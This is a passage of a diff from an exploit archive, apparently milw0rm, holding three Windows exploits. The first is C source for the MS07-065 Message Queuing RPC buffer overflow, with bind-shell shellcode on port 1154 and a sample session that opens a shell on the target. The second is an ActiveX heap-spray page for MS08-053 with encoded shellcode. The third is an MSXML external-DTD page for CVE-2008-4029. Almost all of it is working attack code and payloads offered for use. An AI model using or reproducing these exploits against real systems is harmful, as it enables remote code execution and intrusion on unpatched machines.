-0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
-0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
-0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
-0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
-0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
-0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
-0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
-0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
-0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
-0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
-0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
-0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
-0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
-0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
-0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
-0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 };
- 
- 
- 
-void usage(char *argv) {
-   printf(" Usage:   %s -h 127.0.0.1 (Universal exploit)\n",argv);
-   printf("          %s -h host [-p port]\n",argv);
-   printf(" Targets:\n");
-   exit(1);   
-}
- 
- 
- 
-/************* TCP connect *************************/
- 
-void Disconnect(SOCKET s);
- 
- 
-// ripped from isno
-int Make_Connection(char *address,int port,int timeout)
-{
-    struct sockaddr_in target;
-    SOCKET s;
-    int i;
-    DWORD bf;
-    fd_set wd;
-    struct timeval tv;
- 
-    s = socket(AF_INET,SOCK_STREAM,0);
-    if(s<0)
-        return -1;
- 
-    target.sin_family = AF_INET;
-    target.sin_addr.s_addr = inet_addr(address);
-    if(target.sin_addr.s_addr==0)
-    {
-        closesocket(s);
-        return -2;
-    }
-    target.sin_port = htons((short)port);
-    bf = 1;
-    ioctlsocket(s,FIONBIO,&bf);
-    tv.tv_sec = timeout;
-    tv.tv_usec = 0;
-    FD_ZERO(&wd);
-    FD_SET(s,&wd);
-    connect(s,(struct sockaddr *)&target,sizeof(target));
-    if((i=select(s+1,0,&wd,0,&tv))==(-1))
-    {
-        closesocket(s);
-        return -3;
-    }
-    if(i==0)
-    {
-        closesocket(s);
-        return -4;
-    }
-    i = sizeof(int);
-    getsockopt(s,SOL_SOCKET,SO_ERROR,(char *)&bf,&i);
-    if((bf!=0)||(i!=sizeof(int)))
-    {
-        closesocket(s);
-        return -5;
-    }
-    ioctlsocket(s,FIONBIO,&bf);
-    return s;
-}
- 
- 
-void Disconnect(SOCKET s)
-{
-         closesocket(s);
-         WSACleanup();
-}
- 
-/****************************************************/
- 
- 
- 
-int main(int argc, char * argv[]){
- 
-   unsigned char * target = NULL;
-   int port = 2103;
-   int i;
- 
-   int  ret;
-   char buffer[6000] = {0};
-   SOCKET  s;
-   WSADATA WSAData;
- 
-   printf("--------------------------------------------------------------------------\n");
-   printf("-== Windows Message Queuing Service RPC BOF Exploit (MS07-065) ==-\n");
-   printf("-== code by axis@ph4nt0m ==-\n");
-   printf("-== Http://www.ph4nt0m.org ==-\n");
-   printf("-== Tested against Windows 2000 server SP4 ==-\n");
-   printf("--------------------------------------------------------------------------\n\n");
- 
- 
-    if (argc==1) usage(argv[0]); //Handle parameters
-     for(i=1;i<argc;i++) {
-      if ( (argv[i][0]=='-') ) {
-         switch (argv[i][1]) {
-         case 'h':
-            target=(unsigned char *)argv[i+1];
-            break;
-         case 'p':
-            if (strcmp(argv[i+1],"2103")==0) {
-               printf("[+] Attacking default port 2103\n");
-            } else {
-               port=atoi(argv[i+1]);
-            }
-            break;            
-         default:
-            printf("[-] Invalid argument: %s\n",argv[i]);
-            usage(argv[0]);
-            break;
-         }
-         i++;            
-           } else usage(argv[0]);
-          }
- 
-/********************** attack payload ***************************/
-                    if(WSAStartup (MAKEWORD(1,1), &WSAData) != 0)
-                    {
-            fprintf(stderr, "[-] WSAStartup failed.\n");
-            WSACleanup();
-            exit(1);
-                    }
- 
- 
-                    //Sleep(1200);
- 
- 
-         s = Make_Connection((char *)target, port, 10);
-         if(s<0)
-                    {
-            fprintf(stderr, "[-] connect err.\n");
-            exit(1);
-                    }
- 
-                   //Send our evil Payload              
-        printf("[*]Sending our Payload, Good Luck! ^_^\n");
- 
-                   printf("[*]Sending RPC Bind String!\n");
-                   send(s, bind_str, sizeof(bind_str), 0);
- 
-                   Sleep(1000);
-                  
-                   printf("[*]Sending RPC Request Now!\n");
-                   memset(buffer, '\x41', sizeof(buffer));  // fil the buffer to trigger seh
-    send(s, request_1, sizeof(request_1), 0);
-                   send(s, buffer, 5104, 0);   // fil the buffer to trigger seh
-                   send(s, request_2, sizeof(request_2), 0);
-                  
- 
-        Sleep(100);
- 
-             memset(buffer, 0, sizeof(buffer));
-             ret = recv(s, buffer, sizeof(buffer)-1, 0);
-                   //printf("recv: %s\n", buffer);
- 
-                   Disconnect(s);
- 
-                   return 0;
-}
-
-// milw0rm.com [2007-12-18]
+/*
+Windows Message Queuing Service Remote RPC BOF Exploit (MS07-065)
+by axis
+http://www.ph4nt0m.org
+ 
+  you should know the dnsname of target to trigger this vuln
+  the service runs on port 2103/2105/2107
+ 
+D:\soft\develop\MyProjects\temp\Debug>temp.exe -h 192.168.152.100 -p 2103
+--------------------------------------------------------------------------
+-== Windows Message Queuing Service Remote RPC BOF Exploit (MS07-065) ==-
+-== code by axis@ph4nt0m ==-
+-== Http://www.ph4nt0m.org ==-
+-== Tested against Windows 2000 server SP4 ==-
+--------------------------------------------------------------------------
+ 
+[+] Attacking default port 2103
+[*]Sending our Payload, Good Luck! ^_^
+[*]Sending RPC Bind String!
+[*]Sending RPC Request Now!
+ 
+D:\soft\develop\MyProjects\temp\Debug>
+ 
+ 
+D:\>nc -vv -n 192.168.152.100 1154
+(UNKNOWN) [192.168.152.100] 1154 (?) open: unknown socket error
+Microsoft Windows 2000 [Version 5.00.2195]
+(C) 版权所有 1985-2000 Microsoft Corp.
+ 
+C:\WINNT\system32>exit
+exit
+sent 5, rcvd 109: NOTSOCK
+ 
+D:\>
+ 
+ 
+*/
+#include <stdio.h>
+#include <stdlib.h>
+#include <ctype.h>
+#include <winsock.h>
+#include <io.h>
+#pragma comment(lib,"ws2_32")
+ 
+// RPC Bind UUID: fdb3a030-065f-11d1-bb9b-00a024ea5525 v1.0
+char bind_str[] = {
+0x05, 0x00, 0x0b, 0x03, 0x10, 0x00, 0x00, 0x00,
+0x48, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00,
+0xd0, 0x16, 0xd0, 0x16, 0x00, 0x00, 0x00, 0x00,
+0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00,
+0x30, 0xa0, 0xb3, 0xfd, 0x5f, 0x06, 0xd1, 0x11,
+0xbb, 0x9b, 0x00, 0xa0, 0x24, 0xea, 0x55, 0x25,
+0x01, 0x00, 0x00, 0x00, 0x04, 0x5d, 0x88, 0x8a,
+0xeb, 0x1c, 0xc9, 0x11, 0x9f, 0xe8, 0x08, 0x00,
+0x2b, 0x10, 0x48, 0x60, 0x02, 0x00, 0x00, 0x00 };
+ 
+ 
+// RPC Request  Opnum: 0x06 
+char request_1[] = {
+0x05, 0x00, 0x00, 0x81, 0x10, 0x00, 0x00, 0x00,
+0xd0, 0x16, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00,
+0x98, 0x17, 0x00, 0x00, 0x00, 0x00, 0x06, 0x00,
+0x30, 0xa0, 0xb3, 0xfd, 0x5f, 0x06, 0xd1, 0x11,
+0xbb, 0x9b, 0x00, 0xa0, 0x24, 0xea, 0x55, 0x25,
+0x01, 0x00, 0x00, 0x00, 0xba, 0x0b, 0x00, 0x00,
+0x00, 0x00, 0x00, 0x00, 0xba, 0x0b, 0x00, 0x00,
+0x61, 0x00, 0x2d, 0x00, 0x64, 0x00, 0x64, 0x00,  // target's dns name (unicode)
+0x61, 0x00, 0x34, 0x00, 0x31, 0x00, 0x33, 0x00,
+0x39, 0x00, 0x38, 0x00, 0x66, 0x00, 0x34, 0x00,
+0x34, 0x00, 0x66, 0x00, 0x34, 0x00, 0x2e, 0x00,
+0x66, 0x00, 0x75, 0x00, 0x63, 0x00, 0x6b, 0x00,
+0x5c, 0x00, 0x00, 0xcc, 0x41, 0x41, 0x41, 0x41,
+0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+0x41, 0x41, 0xeb, 0x06, 0x42, 0x42, 0x32, 0xb0,     // \xeb\x06\x42\x42 jmpcode
+0x01, 0x78, 0x2b, 0xc9, 0x83, 0xe9, 0xb0, 0xd9,     //  overwrite seh ; call ebx
+0xee, 0xd9, 0x74, 0x24, 0xf4, 0x5b, 0x81, 0x73,     //  bindshell on port 1154, metasploit shellcode
+0x13, 0x1d, 0x82, 0x67, 0xb4, 0x83, 0xeb, 0xfc,
+0xe2, 0xf4, 0xe1, 0xe8, 0x8c, 0xf9, 0xf5, 0x7b,
+0x98, 0x4b, 0xe2, 0xe2, 0xec, 0xd8, 0x39, 0xa6,
+0xec, 0xf1, 0x21, 0x09, 0x1b, 0xb1, 0x65, 0x83,
+0x88, 0x3f, 0x52, 0x9a, 0xec, 0xeb, 0x3d, 0x83,
+0x8c, 0xfd, 0x96, 0xb6, 0xec, 0xb5, 0xf3, 0xb3,
+0xa7, 0x2d, 0xb1, 0x06, 0xa7, 0xc0, 0x1a, 0x43,
+0xad, 0xb9, 0x1c, 0x40, 0x8c, 0x40, 0x26, 0xd6,
+0x43, 0x9c, 0x68, 0x67, 0xec, 0xeb, 0x39, 0x83,
+0x8c, 0xd2, 0x96, 0x8e, 0x2c, 0x3f, 0x42, 0x9e,
+0x66, 0x5f, 0x1e, 0xae, 0xec, 0x3d, 0x71, 0xa6,
+0x7b, 0xd5, 0xde, 0xb3, 0xbc, 0xd0, 0x96, 0xc1,
+0x57, 0x3f, 0x5d, 0x8e, 0xec, 0xc4, 0x01, 0x2f,
+0xec, 0xf4, 0x15, 0xdc, 0x0f, 0x3a, 0x53, 0x8c,
+0x8b, 0xe4, 0xe2, 0x54, 0x01, 0xe7, 0x7b, 0xea,
+0x54, 0x86, 0x75, 0xf5, 0x14, 0x86, 0x42, 0xd6,
+0x98, 0x64, 0x75, 0x49, 0x8a, 0x48, 0x26, 0xd2,
+0x98, 0x62, 0x42, 0x0b, 0x82, 0xd2, 0x9c, 0x6f,
+0x6f, 0xb6, 0x48, 0xe8, 0x65, 0x4b, 0xcd, 0xea,
+0xbe, 0xbd, 0xe8, 0x2f, 0x30, 0x4b, 0xcb, 0xd1,
+0x34, 0xe7, 0x4e, 0xd1, 0x24, 0xe7, 0x5e, 0xd1,
+0x98, 0x64, 0x7b, 0xea, 0x63, 0x36, 0x7b, 0xd1,
+0xee, 0x55, 0x88, 0xea, 0xc3, 0xae, 0x6d, 0x45,
+0x30, 0x4b, 0xcb, 0xe8, 0x77, 0xe5, 0x48, 0x7d,
+0xb7, 0xdc, 0xb9, 0x2f, 0x49, 0x5d, 0x4a, 0x7d,
+0xb1, 0xe7, 0x48, 0x7d, 0xb7, 0xdc, 0xf8, 0xcb,
+0xe1, 0xfd, 0x4a, 0x7d, 0xb1, 0xe4, 0x49, 0xd6,
+0x32, 0x4b, 0xcd, 0x11, 0x0f, 0x53, 0x64, 0x44,
+0x1e, 0xe3, 0xe2, 0x54, 0x32, 0x4b, 0xcd, 0xe4,
+0x0d, 0xd0, 0x7b, 0xea, 0x04, 0xd9, 0x94, 0x67,
+0x0d, 0xe4, 0x44, 0xab, 0xab, 0x3d, 0xfa, 0xe8,
+0x23, 0x3d, 0xff, 0xb3, 0xa7, 0x47, 0xb7, 0x7c,
+0x25, 0x99, 0xe3, 0xc0, 0x4b, 0x27, 0x90, 0xf8,
+0x5f, 0x1f, 0xb6, 0x29, 0x0f, 0xc6, 0xe3, 0x31,
+0x71, 0x4b, 0x68, 0xc6, 0x98, 0x62, 0x46, 0xd5,
+0x35, 0xe5, 0x4c, 0xd3, 0x0d, 0xb5, 0x4c, 0xd3,
+0x32, 0xe5, 0xe2, 0x52, 0x0f, 0x19, 0xc4, 0x87,
+0xa9, 0xe7, 0xe2, 0x54, 0x0d, 0x4b, 0xe2, 0xb5,
+0x98, 0x64, 0x96, 0xd5, 0x9b, 0x37, 0xd9, 0xe6,
+0x98, 0x62, 0x4f, 0x7d, 0xb7, 0xdc, 0xf2, 0x4c,
+0x87, 0xd4, 0x4e, 0x7d, 0xb1, 0x4b, 0xcd, 0x82,
+0x67, 0xb4, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41};
+ 
+ 
+char request_2[] = {
+0x05, 0x00, 0x00, 0x82, 0x10, 0x00, 0x00, 0x00,
+0x18, 0x01, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00,
+0xf0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x06, 0x00,
+0x30, 0xa0, 0xb3, 0xfd, 0x5f, 0x06, 0xd1, 0x11,
+0xbb, 0x9b, 0x00, 0xa0, 0x24, 0xea, 0x55, 0x25,
+0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 };
+ 
+ 
+ 
+void usage(char *argv) {
+   printf(" Usage:   %s -h 127.0.0.1 (Universal exploit)\n",argv);
+   printf("          %s -h host [-p port]\n",argv);
+   printf(" Targets:\n");
+   exit(1);   
+}
+ 
+ 
+ 
+/************* TCP connect *************************/
+ 
+void Disconnect(SOCKET s);
+ 
+ 
+// ripped from isno
+int Make_Connection(char *address,int port,int timeout)
+{
+    struct sockaddr_in target;
+    SOCKET s;
+    int i;
+    DWORD bf;
+    fd_set wd;
+    struct timeval tv;
+ 
+    s = socket(AF_INET,SOCK_STREAM,0);
+    if(s<0)
+        return -1;
+ 
+    target.sin_family = AF_INET;
+    target.sin_addr.s_addr = inet_addr(address);
+    if(target.sin_addr.s_addr==0)
+    {
+        closesocket(s);
+        return -2;
+    }
+    target.sin_port = htons((short)port);
+    bf = 1;
+    ioctlsocket(s,FIONBIO,&bf);
+    tv.tv_sec = timeout;
+    tv.tv_usec = 0;
+    FD_ZERO(&wd);
+    FD_SET(s,&wd);
+    connect(s,(struct sockaddr *)&target,sizeof(target));
+    if((i=select(s+1,0,&wd,0,&tv))==(-1))
+    {
+        closesocket(s);
+        return -3;
+    }
+    if(i==0)
+    {
+        closesocket(s);
+        return -4;
+    }
+    i = sizeof(int);
+    getsockopt(s,SOL_SOCKET,SO_ERROR,(char *)&bf,&i);
+    if((bf!=0)||(i!=sizeof(int)))
+    {
+        closesocket(s);
+        return -5;
+    }
+    ioctlsocket(s,FIONBIO,&bf);
+    return s;
+}
+ 
+ 
+void Disconnect(SOCKET s)
+{
+         closesocket(s);
+         WSACleanup();
+}
+ 
+/****************************************************/
+ 
+ 
+ 
+int main(int argc, char * argv[]){
+ 
+   unsigned char * target = NULL;
+   int port = 2103;
+   int i;
+ 
+   int  ret;
+   char buffer[6000] = {0};
+   SOCKET  s;
+   WSADATA WSAData;
+ 
+   printf("--------------------------------------------------------------------------\n");
+   printf("-== Windows Message Queuing Service RPC BOF Exploit (MS07-065) ==-\n");
+   printf("-== code by axis@ph4nt0m ==-\n");
+   printf("-== Http://www.ph4nt0m.org ==-\n");
+   printf("-== Tested against Windows 2000 server SP4 ==-\n");
+   printf("--------------------------------------------------------------------------\n\n");
+ 
+ 
+    if (argc==1) usage(argv[0]); //Handle parameters
+     for(i=1;i<argc;i++) {
+      if ( (argv[i][0]=='-') ) {
+         switch (argv[i][1]) {
+         case 'h':
+            target=(unsigned char *)argv[i+1];
+            break;
+         case 'p':
+            if (strcmp(argv[i+1],"2103")==0) {
+               printf("[+] Attacking default port 2103\n");
+            } else {
+               port=atoi(argv[i+1]);
+            }
+            break;            
+         default:
+            printf("[-] Invalid argument: %s\n",argv[i]);
+            usage(argv[0]);
+            break;
+         }
+         i++;            
+           } else usage(argv[0]);
+          }
+ 
+/********************** attack payload ***************************/
+                    if(WSAStartup (MAKEWORD(1,1), &WSAData) != 0)
+                    {
+            fprintf(stderr, "[-] WSAStartup failed.\n");
+            WSACleanup();
+            exit(1);
+                    }
+ 
+ 
+                    //Sleep(1200);
+ 
+ 
+         s = Make_Connection((char *)target, port, 10);
+         if(s<0)
+                    {
+            fprintf(stderr, "[-] connect err.\n");
+            exit(1);
+                    }
+ 
+                   //Send our evil Payload              
+        printf("[*]Sending our Payload, Good Luck! ^_^\n");
+ 
+                   printf("[*]Sending RPC Bind String!\n");
+                   send(s, bind_str, sizeof(bind_str), 0);
+ 
+                   Sleep(1000);
+                  
+                   printf("[*]Sending RPC Request Now!\n");
+                   memset(buffer, '\x41', sizeof(buffer));  // fil the buffer to trigger seh
+    send(s, request_1, sizeof(request_1), 0);
+                   send(s, buffer, 5104, 0);   // fil the buffer to trigger seh
+                   send(s, request_2, sizeof(request_2), 0);
+                  
+ 
+        Sleep(100);
+ 
+             memset(buffer, 0, sizeof(buffer));
+             ret = recv(s, buffer, sizeof(buffer)-1, 0);
+                   //printf("recv: %s\n", buffer);
+ 
+                   Disconnect(s);
+ 
+                   return 0;
+}
+
+// milw0rm.com [2007-12-18]

platforms/windows/remote/6454.html

@@ -1,64 +1,64 @@
-<html>
-<pre>
-
- =============================================================================
- MS08-053 Windows Media Encoder wmex.dll ActiveX Control Buffer Overflow  
- =============================================================================
-
- Calc execution POC Exploit for WinXP SP2 PRO English / IE6.0 SP2
-
- Found by   : Nguyen Minh Duc and Le Manh Tung
- Advisory   : http://www.microsoft.com/technet/security/Bulletin/MS08-053.mspx
- 
- Exploit by : haluznik | haluznik<at>gmail.com
-
- 09.10.2008 
- =============================================================================
-
-<input language=JavaScript onclick=poc() type=button value="launch exploit">
-
-<OBJECT id="target" classid="clsid:A8D3AD02-7508-4004-B2E9-AD33F087F43C">
-</OBJECT>
-
-<script>
-
-function poc() {
- 
-var shellcode = unescape(
-"%u03eb%ueb59%ue805%ufff8%uffff%u4949%u4949%u4949%u4948%u4949" +
-"%u4949%u4949%u4949%u4949%u5a51%u436a%u3058%u3142%u4250%u6b41" +
-"%u4142%u4253%u4232%u3241%u4141%u4130%u5841%u3850%u4242%u4875" +
-"%u6b69%u4d4c%u6338%u7574%u3350%u6730%u4c70%u734b%u5775%u6e4c" +
-"%u636b%u454c%u6355%u3348%u5831%u6c6f%u704b%u774f%u6e68%u736b" +
-"%u716f%u6530%u6a51%u724b%u4e69%u366b%u4e54%u456b%u4a51%u464e" +
-"%u6b51%u4f70%u4c69%u6e6c%u5964%u7350%u5344%u5837%u7a41%u546a" +
-"%u334d%u7831%u4842%u7a6b%u7754%u524b%u6674%u3444%u6244%u5955" +
-"%u6e75%u416b%u364f%u4544%u6a51%u534b%u4c56%u464b%u726c%u4c6b" +
-"%u534b%u376f%u636c%u6a31%u4e4b%u756b%u6c4c%u544b%u4841%u4d6b" +
-"%u5159%u514c%u3434%u4a44%u3063%u6f31%u6230%u4e44%u716b%u5450" +
-"%u4b70%u6b35%u5070%u4678%u6c6c%u634b%u4470%u4c4c%u444b%u3530" +
-"%u6e4c%u6c4d%u614b%u5578%u6a58%u644b%u4e49%u6b6b%u6c30%u5770" +
-"%u5770%u4770%u4c70%u704b%u4768%u714c%u444f%u6b71%u3346%u6650" +
-"%u4f36%u4c79%u6e38%u4f63%u7130%u306b%u4150%u5878%u6c70%u534a" +
-"%u5134%u334f%u4e58%u3978%u6d6e%u465a%u616e%u4b47%u694f%u6377" +
-"%u4553%u336a%u726c%u3057%u5069%u626e%u7044%u736f%u4147%u4163" +
-"%u504c%u4273%u3159%u5063%u6574%u7035%u546d%u6573%u3362%u306c" +
-"%u4163%u7071%u536c%u6653%u314e%u7475%u7038%u7765%u4370");
-
-var buff= "";
-var nsp = unescape("%u06EB%u9090");
-var sh = unescape("%u6950%u74C9");
-var nop = unescape("%u9090%u9090%u9090%u9090%u9090%u9090");
-
-for (i=0;i<1638;i++)  buff=buff + unescape("%u4141");
-
-buff = buff + nsp + sh + nop + shellcode;
-
-target.GetDetailsString(buff,1);
-}
-
-</script>
-</pre>
-</html>
-
-# milw0rm.com [2008-09-13]
+<html>
+<pre>
+
+ =============================================================================
+ MS08-053 Windows Media Encoder wmex.dll ActiveX Control Buffer Overflow  
+ =============================================================================
+
+ Calc execution POC Exploit for WinXP SP2 PRO English / IE6.0 SP2
+
+ Found by   : Nguyen Minh Duc and Le Manh Tung
+ Advisory   : http://www.microsoft.com/technet/security/Bulletin/MS08-053.mspx
+ 
+ Exploit by : haluznik | haluznik<at>gmail.com
+
+ 09.10.2008 
+ =============================================================================
+
+<input language=JavaScript onclick=poc() type=button value="launch exploit">
+
+<OBJECT id="target" classid="clsid:A8D3AD02-7508-4004-B2E9-AD33F087F43C">
+</OBJECT>
+
+<script>
+
+function poc() {
+ 
+var shellcode = unescape(
+"%u03eb%ueb59%ue805%ufff8%uffff%u4949%u4949%u4949%u4948%u4949" +
+"%u4949%u4949%u4949%u4949%u5a51%u436a%u3058%u3142%u4250%u6b41" +
+"%u4142%u4253%u4232%u3241%u4141%u4130%u5841%u3850%u4242%u4875" +
+"%u6b69%u4d4c%u6338%u7574%u3350%u6730%u4c70%u734b%u5775%u6e4c" +
+"%u636b%u454c%u6355%u3348%u5831%u6c6f%u704b%u774f%u6e68%u736b" +
+"%u716f%u6530%u6a51%u724b%u4e69%u366b%u4e54%u456b%u4a51%u464e" +
+"%u6b51%u4f70%u4c69%u6e6c%u5964%u7350%u5344%u5837%u7a41%u546a" +
+"%u334d%u7831%u4842%u7a6b%u7754%u524b%u6674%u3444%u6244%u5955" +
+"%u6e75%u416b%u364f%u4544%u6a51%u534b%u4c56%u464b%u726c%u4c6b" +
+"%u534b%u376f%u636c%u6a31%u4e4b%u756b%u6c4c%u544b%u4841%u4d6b" +
+"%u5159%u514c%u3434%u4a44%u3063%u6f31%u6230%u4e44%u716b%u5450" +
+"%u4b70%u6b35%u5070%u4678%u6c6c%u634b%u4470%u4c4c%u444b%u3530" +
+"%u6e4c%u6c4d%u614b%u5578%u6a58%u644b%u4e49%u6b6b%u6c30%u5770" +
+"%u5770%u4770%u4c70%u704b%u4768%u714c%u444f%u6b71%u3346%u6650" +
+"%u4f36%u4c79%u6e38%u4f63%u7130%u306b%u4150%u5878%u6c70%u534a" +
+"%u5134%u334f%u4e58%u3978%u6d6e%u465a%u616e%u4b47%u694f%u6377" +
+"%u4553%u336a%u726c%u3057%u5069%u626e%u7044%u736f%u4147%u4163" +
+"%u504c%u4273%u3159%u5063%u6574%u7035%u546d%u6573%u3362%u306c" +
+"%u4163%u7071%u536c%u6653%u314e%u7475%u7038%u7765%u4370");
+
+var buff= "";
+var nsp = unescape("%u06EB%u9090");
+var sh = unescape("%u6950%u74C9");
+var nop = unescape("%u9090%u9090%u9090%u9090%u9090%u9090");
+
+for (i=0;i<1638;i++)  buff=buff + unescape("%u4141");
+
+buff = buff + nsp + sh + nop + shellcode;
+
+target.GetDetailsString(buff,1);
+}
+
+</script>
+</pre>
+</html>
+
+# milw0rm.com [2008-09-13]

platforms/windows/remote/7196.html

@@ -1,17 +1,17 @@
-<html>
-<body>
-KB955218 - CVE-2008-4029 - JA
-<script type="text/javascript">
-var dom = new ActiveXObject("Msxml2.DOMDocument.3.0");
-dom.async = false;
-var url = "http://www.milw0rm.com/forfun.dtd";
-var xml = "<!DOCTYPE pwn SYSTEM '" + url + "'>";
-if (dom.loadXML(xml) == 0)
-{
-	alert("Blue or Red Pill? " + dom.parseError.srcText);
-}
-</script>
-</body>
-</html>
-
-# milw0rm.com [2008-11-23]
+<html>
+<body>
+KB955218 - CVE-2008-4029 - JA
+<script type="text/javascript">
+var dom = new ActiveXObject("Msxml2.DOMDocument.3.0");
+dom.async = false;
+var url = "http://www.milw0rm.com/forfun.dtd";
+var xml = "<!DOCTYPE pwn SYSTEM '" + url + "'>";
+if (dom.loadXML(xml) == 0)
+{
+	alert("Blue or Red Pill? " + dom.parseError.srcText);
+}
+</script>
+</body>
+</html>
+
+# milw0rm.com [2008-11-23]